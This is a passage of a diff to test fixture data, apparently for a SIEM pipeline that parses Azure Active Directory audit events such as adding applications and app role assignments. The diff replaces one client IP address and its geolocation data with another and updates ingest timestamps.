5e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125190800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -12827,25 +11729,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -12859,7 +11743,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -12985,7 +11869,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -12997,12 +11881,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036438400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125197800Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -13028,25 +11912,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -13060,7 +11926,7 @@ "ObjectId": "Not Available", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -13186,7 +12052,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -13198,12 +12064,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036442800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125202500Z", + "original": 